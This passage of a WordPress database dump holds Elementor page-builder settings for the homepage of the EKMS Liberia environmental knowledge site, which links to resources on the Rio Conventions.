fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(12507,2044,'_elementor_version','2.7.5'),(12508,2044,'_elementor_template_type','wp-page'),(12509,2044,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(12511,2045,'_wp_page_template','default'),(12512,2045,'_elementor_edit_mode','builder'),(12513,2045,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(17,59,102,0.83)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the 